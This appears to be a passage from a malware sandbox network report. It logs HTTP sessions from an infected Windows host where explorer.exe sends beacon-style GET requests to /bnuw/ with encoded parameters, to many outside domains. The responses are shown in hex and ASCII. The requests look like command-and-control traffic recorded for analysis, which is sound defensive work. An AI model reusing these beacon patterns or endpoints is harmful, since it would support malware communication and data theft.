Jan 27, 2021 15:40:51.629750013 CET | 5409 | OUT | GET /bnuw/?Mv0h=sBaVa8kj+YCbP3U2o3QVtpVj9pzNwi4112+9WTWVNa3X8ft1LfuComp0EF+DLQnGsCaK&VPXh=GhIH HTTP/1.1
    Host: www.dmvantalya.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Jan 27, 2021 15:40:51.940468073 CET | 5409 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 27 Jan 2021 14:40:51 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    Data Raw: 36 39 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 2f 6a 73 2f 77 77 64 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 69<html><head><script type='text/javascript' src='/js/wwd.js'></script></head><body></script></body></html>0


Session ID: 11 | Source IP: 192.168.2.5 | Source Port: 49744 | Destination IP: 46.38.226.47 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 27, 2021 15:40:57.111819983 CET | 5411 | OUT | GET /bnuw/?Mv0h=/+b+PR1HqbzITR/xPqvCXgD2JDomfeuYUy/NSf/Itxe+SMeGrZJLG9WamYt6TAOy7qnF&VPXh=GhIH HTTP/1.1
    Host: www.husum-ferienwohnungen.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Jan 27, 2021 15:40:57.161020994 CET | 5412 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Wed, 27 Jan 2021 14:40:57 GMT
    Content-Type: text/html
    Content-Length: 1039
    Connection: close
    Vary: Accept-Encoding
    Last-Modified: Tue, 24 Feb 2015 16:29:52 GMT
    ETag: "40f-50fd8074406b0"
    Accept-Ranges: bytes
    Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE><BASE href="/error_docs/">...[if lte IE 6]></BASE><![endif]--></HEAD><BODY><H1>Not Found</H1>The requested document was not found on this server.<P><HR><ADDRESS>Web Server at web122.server01.fruitmedia.de</ADDRESS></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->


Session ID: 12 | Source IP: 192.168.2.5 | Source Port: 49745 | Destination IP: 184.168.131.241 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 27, 2021 15:41:05.444685936 CET | 5413 | OUT | GET /bnuw/?Mv0h=ilxBzx5jzN5hMHP3lEnoWOla5UnSCnIEyVz4htafUXtg/D1GhDNvtcAOSSVsQdsK+0zz&VPXh=GhIH HTTP/1.1
    Host: www.swiftappliancessc.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Jan 27, 2021 15:41:05.679910898 CET | 5413 | IN | HTTP/1.1 301 Moved Permanently
    Server: nginx/1.16.1
    Date: Wed, 27 Jan 2021 14:41:05 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Location: https://www.swiftappliancesc.com/bnuw/?Mv0h=ilxBzx5jzN5hMHP3lEnoWOla5UnSCnIEyVz4htafUXtg/D1GhDNvtcAOSSVsQdsK+0zz&VPXh=GhIH
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 13 | Source IP: 192.168.2.5 | Source Port: 49746 | Destination IP: 69.163.224.168 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 27, 2021 15:41:11.142014980 CET | 5414 | OUT | GET /bnuw/?Mv0h=UaN922MvMgW8WO4gu4dCtZfuQaKmG0MLXVbxDGTLVk691LjZJH+3nMRa/tXw417tQlSj&VPXh=GhIH HTTP/1.1
    Host: www.state728.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Jan 27, 2021 15:41:13.142405033 CET | 5416 | IN | HTTP/1.1 404 Not Found
    Date: Wed, 27 Jan 2021 14:41:11 GMT
    Server: Apache
    Vary: Accept-Encoding,Cookie,User-Agent
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    Link: <http://www.state728.com/wp-json/>; rel="https://api.w.org/"
    Upgrade: h2
    Connection: Upgrade, close
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8
    Data Ascii: 52fe<!doctype html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><meta name="robots" content="noindex,follow" /><meta property="og:locale" content="en_US" /><meta property="og:type" content="object" /><meta property="og:title" content="Not Found, Error 404" /><meta property="og:site_name" content="State728" />... This site is optimized with the Yoast SEO plugin v14.8.1 - https://yoast.com/wordpress/plugins/seo/ --><title>Not Found, Error 404</title><meta name="robots" content="noindex, follow" /><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found - State728" /><meta property="og:site_name" content="State728" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"htt


Session ID: 14 | Source IP: 192.168.2.5 | Source Port: 49747 | Destination IP: 192.254.186.135 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 27, 2021 15:41:21.965167046 CET | 5429 | OUT | GET /bnuw/?Mv0h=msgcY/GKR2+7Ty9qVKTu9pnyQy/WbDn9v8bhS9H73S6U4m0FMdY0GWjCttMprcSB8tfS&VPXh=GhIH HTTP/1.1
    Host: www.taxandbookkeepingsolutions.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Jan 27, 2021 15:41:25.341475010 CET | 5721 | IN | HTTP/1.1 301 Moved Permanently
    Date: Wed, 27 Jan 2021 14:41:22 GMT
    Server: Apache
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    X-Redirect-By: WordPress
    Upgrade: h2,h2c
    Connection: Upgrade, close
    Location: http://taxandbookkeepingsolutions.com/bnuw/?Mv0h=msgcY/GKR2+7Ty9qVKTu9pnyQy/WbDn9v8bhS9H73S6U4m0FMdY0GWjCttMprcSB8tfS&VPXh=GhIH
    X-Endurance-Cache-Level: 2
    Content-Length: 0
    Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
15 | 192.168.2.5 | 49755 | 118.27.99.25 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jan 27, 2021 15:41:27.762258053 CET | 5994 | OUT | GET /bnuw/?Mv0h=ZkQWQs3u/Pcsc6Be2UsBBupV9psrlEYt+FgoIT3sSBI7ln8n9R9tp98wLB1cQ9m1FW6z&VPXh=GhIH HTTP/1.1
Host: www.rotalablog.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jan 27, 2021 15:41:28.048121929 CET | 6119 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Wed, 27 Jan 2021 14:41:27 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.rotalablog.com/bnuw/?Mv0h=ZkQWQs3u/Pcsc6Be2UsBBupV9psrlEYt+FgoIT3sSBI7ln8n9R9tp98wLB1cQ9m1FW6z&VPXh=GhIH
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
16 | 192.168.2.5 | 49759 | 149.210.170.235 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jan 27, 2021 15:41:33.105868101 CET | 6284 | OUT | GET /bnuw/?Mv0h=9icL5DbtPB2as1Zd6Xg9EreNcG85hnBQd3Q23kTehbS+jnaTFoKfU18SI/G9uvH42aor&VPXh=GhIH HTTP/1.1
Host: www.expand.care
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jan 27, 2021 15:41:33.161778927 CET | 6285 | IN | HTTP/1.1 301 Moved Permanently
Date: Wed, 27 Jan 2021 14:41:33 GMT
Server: Apache
Location: https://www.expand.care/bnuw/?Mv0h=9icL5DbtPB2as1Zd6Xg9EreNcG85hnBQd3Q23kTehbS+jnaTFoKfU18SI/G9uvH42aor&VPXh=GhIH
Content-Length: 325
Connection: close
Content-Type: text/html; charset=iso-8859-1
X-TransIP-Backend: web870
X-TransIP-Balancer: balancer7
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 65 78 70 61 6e 64 2e 63 61 72 65 2f 62 6e 75 77 2f 3f 4d 76 30 68 3d 39 69 63 4c 35 44 62 74 50 42 32 61 73 31 5a 64 36 58 67 39 45 72 65 4e 63 47 38 35 68 6e 42 51 64 33 51 32 33 6b 54 65 68 62 53 2b 6a 6e 61 54 46 6f 4b 66 55 31 38 53 49 2f 47 39 75 76 48 34 32 61 6f 72 26 61 6d 70 3b 56 50 58 68 3d 47 68 49 48 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.expand.care/bnuw/?Mv0h=9icL5DbtPB2as1Zd6Xg9EreNcG85hnBQd3Q23kTehbS+jnaTFoKfU18SI/G9uvH42aor&amp;VPXh=GhIH">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
17 | 192.168.2.5 | 49760 | 51.195.43.214 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jan 27, 2021 15:41:38.235146999 CET | 6286 | OUT | GET /bnuw/?Mv0h=mq8FdBnXvVD55s8LjK9FZEvCV1OO/e8xkuyico0eSbMj5rSpqU8yGo4yf+6JoC4UpbW1&VPXh=GhIH HTTP/1.1
Host: www.alliswell.info
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jan 27, 2021 15:41:38.288887978 CET | 6286 | IN | HTTP/1.1 302 Found
date: Wed, 27 Jan 2021 14:41:38 GMT
location: https://www.alliswell.info/bnuw/?Mv0h=mq8FdBnXvVD55s8LjK9FZEvCV1OO/e8xkuyico0eSbMj5rSpqU8yGo4yf+6JoC4UpbW1&VPXh=GhIH
content-length: 0
content-type: text/html; charset=UTF-8
connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
18 | 192.168.2.5 | 49761 | 172.120.228.88 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jan 27, 2021 15:41:43.499735117 CET | 6287 | OUT | GET /bnuw/?Mv0h=unzmywU5hP7O9pQ/VNJ9lipk3GER0gynknqK6ctL9m3B0ma88PcLaMbDy7KFiKVjmiKo&VPXh=GhIH HTTP/1.1
Host: www.czb878.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jan 27, 2021 15:41:43.691905975 CET | 6288 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Wed, 27 Jan 2021 14:41:43 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.czb878.com/bnuw/?Mv0h=unzmywU5hP7O9pQ/VNJ9lipk3GER0gynknqK6ctL9m3B0ma88PcLaMbDy7KFiKVjmiKo&VPXh=GhIH
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
19 | 192.168.2.5 | 49762 | 192.0.78.25 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jan 27, 2021 15:41:48.741029024 CET | 6289 | OUT | GET /bnuw/?Mv0h=QSs7jQDeFsICiQBBJT3dneCSujMK1kRtf3DX2CBTXjaAl0pqu+ZlchGrg3MzDtdcBC8Q&VPXh=GhIH HTTP/1.1
Host: www.brendonellis.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jan 27, 2021 15:41:48.783169031 CET | 6289 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Wed, 27 Jan 2021 14:41:48 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.brendonellis.com/bnuw/?Mv0h=QSs7jQDeFsICiQBBJT3dneCSujMK1kRtf3DX2CBTXjaAl0pqu+ZlchGrg3MzDtdcBC8Q&VPXh=GhIH
X-ac: 2.hhn _dca
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.5 | 49734 | 149.210.170.235 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jan 27, 2021 15:40:02.692450047 CET | 5339 | OUT | GET /bnuw/?Mv0h=9icL5DbtPB2as1Zd6Xg9EreNcG85hnBQd3Q23kTehbS+jnaTFoKfU18SI/G9uvH42aor&VPXh=GhIH HTTP/1.1
Host: www.expand.care
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jan 27, 2021 15:40:02.758419037 CET | 5339 | IN | HTTP/1.1 301 Moved Permanently
Date: Wed, 27 Jan 2021 14:40:02 GMT
Server: Apache
Location: https://www.expand.care/bnuw/?Mv0h=9icL5DbtPB2as1Zd6Xg9EreNcG85hnBQd3Q23kTehbS+jnaTFoKfU18SI/G9uvH42aor&VPXh=GhIH
Content-Length: 325
Connection: close
Content-Type: text/html; charset=iso-8859-1
X-TransIP-Backend: web870
X-TransIP-Balancer: balancer5
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 65 78 70 61 6e 64 2e 63 61 72 65 2f 62 6e 75 77 2f 3f 4d 76 30 68 3d 39 69 63 4c 35 44 62 74 50 42 32 61 73 31 5a 64 36 58 67 39 45 72 65 4e 63 47 38 35 68 6e 42 51 64 33 51 32 33 6b 54 65 68 62 53 2b 6a 6e 61 54 46 6f 4b 66 55 31 38 53 49 2f 47 39 75 76 48 34 32 61 6f 72 26 61 6d 70 3b 56 50 58 68 3d 47 68 49 48 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.expand.care/bnuw/?Mv0h=9icL5DbtPB2as1Zd6Xg9EreNcG85hnBQd3Q23kTehbS+jnaTFoKfU18SI/G9uvH42aor&amp;VPXh=GhIH">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
20 | 192.168.2.5 | 49763 | 3.13.31.214 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jan 27, 2021 15:41:55.889050007 CET | 6290 | OUT | GET /bnuw/?Mv0h=H9eFKPT3PZ6+JEukmol4IakM7Rn1bTYI7da3AQhEmZOTwtXfk4c4gWXfuc3t72SmU6ef&VPXh=GhIH HTTP/1.1
Host: www.purposelyproductivelab.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jan 27, 2021 15:41:56.048048973 CET | 6290 | IN | HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=utf-8
Location: https://purposelyproductivelab.com/bnuw/?Mv0h=H9eFKPT3PZ6+JEukmol4IakM7Rn1bTYI7da3AQhEmZOTwtXfk4c4gWXfuc3t72SmU6ef&VPXh=GhIH
X-Redirector-Version: 2.15.3-9d502ae
Date: Wed, 27 Jan 2021 14:41:55 GMT
Content-Length: 163
Connection: close
Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 75 72 70 6f 73 65 6c 79 70 72 6f 64 75 63 74 69 76 65 6c 61 62 2e 63 6f 6d 2f 62 6e 75 77 2f 3f 4d 76 30 68 3d 48 39 65 46 4b 50 54 33 50 5a 36 2b 4a 45 75 6b 6d 6f 6c 34 49 61 6b 4d 37 52 6e 31 62 54 59 49 37 64 61 33 41 51 68 45 6d 5a 4f 54 77 74 58 66 6b 34 63 34 67 57 58 66 75 63 33 74 37 32 53 6d 55 36 65 66 26 61 6d 70 3b 56 50 58 68 3d 47 68 49 48 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 61 3e 2e 0a 0a
Data Ascii: <a href="https://purposelyproductivelab.com/bnuw/?Mv0h=H9eFKPT3PZ6+JEukmol4IakM7Rn1bTYI7da3AQhEmZOTwtXfk4c4gWXfuc3t72SmU6ef&amp;VPXh=GhIH">Moved Permanently</a>.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
21 | 192.168.2.5 | 49764 | 3.0.139.114 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jan 27, 2021 15:42:01.240537882 CET | 6291 | OUT | GET /bnuw/?Mv0h=oQBageEfQvQWJFAXW9y7EEMDG11e2WOjQsYBS6rJpmc3XwkvfF+/+ZMtoN/tAF1fT0AC&VPXh=GhIH HTTP/1.1
Host: www.ekpays.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jan 27, 2021 15:42:01.425765991 CET | 6291 | IN | HTTP/1.1 400 Bad Request
Server: openresty
Date: Wed, 27 Jan 2021 14:42:01 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
22 | 192.168.2.5 | 49765 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 27, 2021 15:42:11.489057064 CET | 6292 | OUT | GET /bnuw/?Mv0h=1oU/nMap4AbjDp4r952Rm+RiaAFKzBneYu9/CIGQRHecOlg44QcSF3Ws3nwJMctl1pZ6&VPXh=GhIH HTTP/1.1
Host: www.beachesvr.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jan 27, 2021 15:42:11.631047964 CET | 6293 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Wed, 27 Jan 2021 14:42:11 GMT
Content-Type: text/html
Content-Length: 275
ETag: "600b4d5c-113"
Via: 1.1 google
Connection: close
                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
23 | 192.168.2.5 | 49766 | 192.249.115.168 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 27, 2021 15:42:16.833240032 CET | 6293 | OUT | GET /bnuw/?Mv0h=XF767cEF5WeJAj2PNi54ASdTmj53lOUjuRZUhg8+4zo28WfhIPsVxcqM+IjYd/OTLsCZ&VPXh=GhIH HTTP/1.1
Host: www.secretlairtoys.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jan 27, 2021 15:42:17.116592884 CET | 6295 | IN | HTTP/1.1 200 OK
Date: Wed, 27 Jan 2021 14:42:16 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=60f7c33b83a16f22f346e83bb8308143; path=/; domain=.secretlairtoys.com
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET,HEAD,POST,PUT,DELETE,OPTIONS
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Content-Type, Authorization
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Data Raw: 33 64 38 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 54 6f 79 2d 41 69 73 6c 65 2e 63 6f 6d 20 2d 20 53 68 6f 70 20 66 6f 72 20 74 6f 79 73 2c 20 6e 6f 74 20 61 64 73 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 21 2d 2d 20 53 45 4f 20 4d 65 74 61 20 54 61 67 73 2d 2d 3e 0a 20 20 3c 21 2d 2d 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 43 61 72 74 7a 69 6c 6c 61 20 2d 20 42 6f 6f 74 73 74 72 61 70 20 45 2d 63 6f 6d 6d 65 72 63 65 20 54 65 6d 70 6c 61 74 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 62 6f 6f 74 73 74 72 61 70 2c 20 73 68 6f 70 2c 20 65 2d 63 6f 6d 6d 65 72 63 65 2c 20 6d 61 72 6b 65 74 2c 20 6d 6f 64 65 72 6e 2c 20 72 65 73 70 6f 6e 73 69 76 65 2c 20 20 62 75 73 69 6e 65 73 73 2c 20 6d 6f 62 69 6c 65 2c 20 62 6f 6f 74 73 74 72 61 70 20 34 2c 20 68 74 6d 6c 35 2c 20 63 73 73 33 2c 20 6a 71 75 65 72 79 2c 20 6a 73 2c 20 67 61 6c 6c 65 72 79 2c 20 73 6c 69 64 65 72 2c 20 74 6f 75 63 68 2c 20 63 72 65 61 74 69 76 65 2c 20 63 6c 65 61 6e 22 3e 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 54 6f 79 2d 41 69 73 6c 65 2e 63 6f 6d 22 3e 0a 20 20 3c 21 2d 2d 20 56 69 65 77 70 6f 72 74 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 